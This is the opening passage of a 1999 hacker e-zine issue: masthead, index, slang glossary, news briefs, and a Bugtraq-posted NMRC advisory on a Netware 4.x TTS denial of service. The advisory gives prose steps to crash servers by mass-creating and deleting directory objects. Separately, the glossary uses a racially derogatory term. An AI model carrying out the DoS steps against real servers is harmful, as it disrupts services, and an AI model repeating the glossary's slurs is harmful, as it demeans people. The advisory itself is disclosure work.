HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 19 Volume 1 1999 May 22nd 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "If hackers ran the world, there'd be no war--lots of accidents, maybe." -Anon. Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #19 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #19 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. NMRC Advisory, DoS with Netware 4.x's TTS........................ 04.0 .. CA's InoculateIT for Windows NT v4.53 only scans inboxes......... 04.1 .. CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4 05.0 .. [ISN] Everywhere your MAC address shows up....................... 06.0 .. [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs.............. 07.0 .. INNdstart 2.0 vulnerability, possible root compromise............ 08.0 .. Sunsolve Database leaks crucial information...................... 09.0 .. [ISN] Asia is wide open to virus, hacker attacks................. 10.0 .. More on Zyklon's legal troubles.................................. 11.0 .. IRC war and a Police HQ bomb threat send two headed for trouble.. 12.0 .. UK Labels Windows as 'secure'.................................... 13.0 .. Yugoslavia to stay plugged in.................................... 14.0 .. VISA Releases Draft Protection Profile .......................... 15.0 .. cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities...... 15.1 .. cgichk.pl PERL version of the above cgi scanner from Wiltered Fire 16.0 .. Vulnerability in Netscape bookmarks found by George Guninski..... 17.0 .. Lotus Notes in bed with the NSA on encryption keys............... 18.0 .. Packetstom Security Gets the choke order for .yu sites........... 19.0 .. Common Trojans and the ports they can be found on................ 20.0 .. Fts_read vulnerabilty provides root compromise in FreeBSD find, du 21.0 .. Excel Macro Virus protection patch has a hole.................... 22.0 .. Possible root compromise when installing new SSHD................ 23.0 .. Apple's AtEase 5.0 security hole................................. 24.0 .. Bug in Microsoft Outlook Express................................. 25.0 .. Trivial buffer overflow DoS on WinAMP 2.x........................ 26.0 .. DISA Limits network activity..................................... 27.0 .. Money in the bank is an intangible?.............................. 28.0 .. r00tfest is May 21st to 23rd, and promises to be a big success... 29.0 .. heh.pl creates a number of rootshells in /tmp and disguises itself 30.0 .. RedHat6.0 fixes available for some current vulnerabilities........ 31.0 .. BisonWare FTP server vulnerabilities can lead to root compromise.. 32.0 .. Key Escrow revisited (who are the real criminals here??).......... 33.0 .. AOL Under Siege by Hackers, NOT! ................................. 34.0 .. Unknown spammer gets sued......................................... 35.0 .. German police crack down on internet crime........................ 36.0 .. After a rather long hiatus BoW resurfaces and releases issue #9... 37.0 .. AntiOnline opens up its knowledge database to the pheds........... 38.0 .. [ISN] RAID99 Hosted by CERIAS Call for papers..................... 39.0 .. Cryptogram May 15th'99............................................ 40.0 .. [ISN] Why i'm a security pessimist................................ 41.0 .. Bombs Off The Net!................................................ 42.0 .. Dark Spyre may end up in jail..................................... 43.0 .. ACTINIC ecommerce package claims to be 'unhackable'............... 44.0 .. MP3's off the net?................................................ 45.0 .. Free DNS! finally a network picks up the pieces from ml.org ...... 46.0 .. pIRCHCrack cracks password in pirch.ini files..................... 47.0 .. NASA vulnerable to attack......................................... 48.0 .. Vermont's Security Compromised ................................... 49.0 .. NIST May Be Named Info Security Clearing House ................... 50.0 .. 097M.Tristate Macro Virus Contained .............................. 51.0 .. "Hackers" Ruin Online Poll ....................................... 52.0 .. DSC v1.01 Released new ezine hits the electronic stands........... 53.0 .. Laser Pointers Illegal? .......................................... 54.0 .. Exploiting NT buffer overruns..................................... 55.0 .. More on biometrics from ZDNET..................................... =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls .......................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://axon.jccc.net/hir/ Hackers Information Report Link http://net-security.org Net Security Link http://www.403-security.org Daily news and security related site Link Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security Shouts to tekz from HK for asking nicely in eye-are-see! ;-) and to t4ck for making my night albeit I couldn't stick around for the rest of the comedy routine. hacked star dot star with phf huh? .... ;-)) and the #innerpulse, crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ FREE KEVIN Demonstrations Go WorldWide From HNN http://www.hackernews.com/ contributed by Macki With demonstrations now scheduled in front of the US Embassy in Russia the FREE KEVIN movement goes World Wide. Kevin Mitnick has been held in pretrial detention since February 15, 1995, without a constitutionally guaranteed bail hearing for possession of software allegedly worth millions of dollars. Protest demonstrations are now being planned around the world for Friday, June 4 in front of federal courthouses and U.S. embassies beginning at 2 pm to protest the unjust treatment of Kevin Mitnick. If there is a protest in your city please attend. If there is not please organize one. The government must be shown that the people will not sit idly by while their rights are trampled! FREE KEVIN Demonstrations http://www.2600.com/demo/index.html ++ OpenBSD 2.5 From HNN http://www.hackernews.com/ contributed by Weld Pond OpenBSD, a Free UNIX variant that places emphasis on portability, standardization, correctness, security, and cryptography, has just been upgraded to version 2.5. OpenBSD is a multiplatform and ultrasecure operating system. HNN uses it, shouldn't you? "OpenBSD: Sending the Kiddies to /dev/null since 1992" openbsd.org http://www.openbsd.org/ Amazon.com- Reserve Your Copy Today! http://www.amazon.com/exec/obidos/ASIN/0968363733/hackernewsnet ++ Chinese attacks on U.S computers From http://www.net-security.org/ CHINESE HACKERS RAID U.S. COMPUTERS by LucasAr, Monday 17th May 1999 on 4:30 pm CET Chinese hackers have attacked U.S. government information systems, including the White House network, in response to the errant bombingof the Chinese Embassy in Yugoslavia, according to an FBI report. ++ Just found this on the net, on Discovery Online no less, it has a (short) Hacker's Hall of Fame list with mini-bios of the featured hackers. - Ed http://www.discovery.com/area/technology/hackers/stallman.html ++ MIT Pulls R2-D2 Hack From HNN http://www.hackernews.com/ contributed by Code Kid Arguably the place where the word Hacker was coined,MIT students have turned the Great Dome into a giant R2-D2. For those of you who have been dead for the last seven years R2-D2 is a android from the Star Wars movie series. The hack consisted of covering the dome in red, white, blue, and black mesh-fabric panels. The hackers left a dozen doughnuts and instructions on how to remove the display. The Great Dome has been a popular place for Hacks in the past. Some of the better known ones have transformed the Dome into a Breast, a Pumpkin, or have placed a Police Crusier replica on the top. MIT Hack Gallery - Pictures Here http://hacks.mit.edu/Hacks/Gallery.html Wired http://www.wired.com/news/news/culture/story/19743.html ++ Scanner profiteer busted From HNN http://www.hackernews.com/ Scanner Profiteer contributed by erewhon Eric Ford, 27, of Studio City, CA, has pleaded guilty of recording and then selling the contents of a cellular phone call he listened to with a modified police scanner.The conversation was "marital squabble" that took place between Tom Cruise and Nicole Kidman. After parts of the conversation appeared in tabloids the couple contacted the FBI to start an investigation. The perpetrator was sentenced by a federal judge to six months in jail, 150 hours of community service and fined $3,000. APB Online http://www.apbonline.com/911/1999/05/17/cruise0517_01.html ++ Internet Set Free in Canada From HNN http://www.hackernews.com/ contributed by blsonne The Canadian Radio-television and Telecommunications Commission (CRTC) agreed on Monday that it will not regulate new media services on the Internet. After concluding that new media services are vibrant, highly competitive and successful without regulation, the CRTC has decided not to impose new rules on the internet so as to not hinder Canada in the global marketplace. CRTC http://www.crtc.gc.ca/ENG/NEWS/RELEASES/1999/R990517e.htm ++ Fujitsu Victim of Password Stealing Virus From HNN http://www.hackernews.com/ contributed by 0yK0t InfoWeb, Fujitsu Ltd.'s Internet service, has become the victim of an email virus designed to steal users passwords. The email claims that users are at risk from a new virus and should run the enclosed attachment as a precaution. The attachment then steals users passwords and emails them to a separate address. G-Search Ltd., a Fujitsu affiliate, says that at least 68 people received the virus/attachment. And once again this virus only effects Windows users. AsiaBizTech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/70448 Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ No mail for sharing this week! ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Issue #19 'w00t' * * * * * * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 Novell Netware buffer overflow in TTS (Transaction Tracking System) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 12 May 1999 14:18:59 -0500 From: Simple Nomad To: BUGTRAQ@netspace.org Subject: DoS with Netware 4.x's TTS _______________________________________________________________________________ Nomad Mobile Research Centre A D V I S O R Y www.nmrc.org Simple Nomad [thegnome@nmrc.org] 12May1998 _______________________________________________________________________________ Platform : Netware 4.x Application : NDS Severity : High Synopsis -------- It is possible to overflow the Transaction Tracking System (TTS) built into Novell Netware and possibly crash multiple servers. Tested configuration -------------------- The testing was done with the following configuration: Netware 4.11, Service Pack 5B Also confirmed on Netware 4.1. All systems had 64MB RAM and 1 GB drive space. Bug(s) report ------------- The Transaction Tracking System (TTS) is used by Novell Netware to help preserve the integrity of data during a system crash. If a transaction is in the process of being written to the hard drive when the system crashes, upon reboot the partial transaction is backed out preserving the integrity of the original data. Administrators can optionally flag a file with the TTS flag to add this protection (typically done with databases, especially those that have no rollback features). TTS by default tracks 10,000 transactions, and each instance uses a small amount of memory. If a burst of transactions are sent to the server and the available memory is exhausted, TTS will disable. While TTS is disabled, no updates can be made to Netware Directory Services. This can impact any program or process that updates NDS, such as login. In extreme overrun cases, such as very large simultaneous (or near simultaneous, actually) transactions, memory will be depleted quick enough to crash the server. This is not entirely uncommon, as any large burst of traffic updating NDS will cause the problem, such as bringing up a server after several days of downtime that has a Directory Services replica on it. Normally this can be corrected by increasing RAM or lowering the amount of transactions tracked >from the maximum default of 10,000 down to say 5,000 by issuing the command SET MAXIMUM TRANSACTIONS = 5000 at the console or via ServMan, and enabling TTS by typing ENABLE TTS at the console. However, a malicious user with proper access can force the memory depletion and potentially crash a server that has a replica of the NDS database. This can lead to multiple near-simultaneous server crashes. Of course anyone with administrative access can do this, but they could obviously do other acts that could be just as destructive, if not more so. What is needed is the ability to create a large number of NDS updates very quickly. For example, if a user has the ability to create a container and add objects to it, them that user has enough authority to potentially cause problems to TTS. Creating a container, dropping a few hundred objects into the container via drag-and-drop and then deleting the container should suffice. If the server lacks a large amount of free memory, the server will quite possibly abend. In other cases, TTS is disabled, which is a form of Denial of Service. As the messages are sent across to other servers containing NDS replicas, they too may crash. In our test environment we were able to crash two servers (Netware 4.1 and Netware 4.11) with a the scenario of creating a container, adding a few hundred users, and then deleting the container. Solution/Workaround ------------------- NMRC has heard reports of as many as a dozen servers crashing within a couple of minutes of each other, so apply the latest Service Pack for Netware 4.x on all servers or upgrade to Netware 5. Comments -------- Novell has already been notified and they are obviously aware of the TTS limitations (refer to the May 1997 TID 2908153 at http://support.novell.com/cgi-bin/search/tidfinder.cgi?2908153 for an example). Per Novell the latest patches for Netware 4.x correct the problem, and Netware 5 does not have the problem at all. Thanks to Michel Labelle for notifying NMRC about this problem. _______________________________________________________________________________ See http://www.nmrc.org/news/ for more advisories. Simple Nomad // thegnome@nmrc.org // ....no rest for the Wicca'd.... www.nmrc.org // @HWA 04.0 InoculateIT for Windows 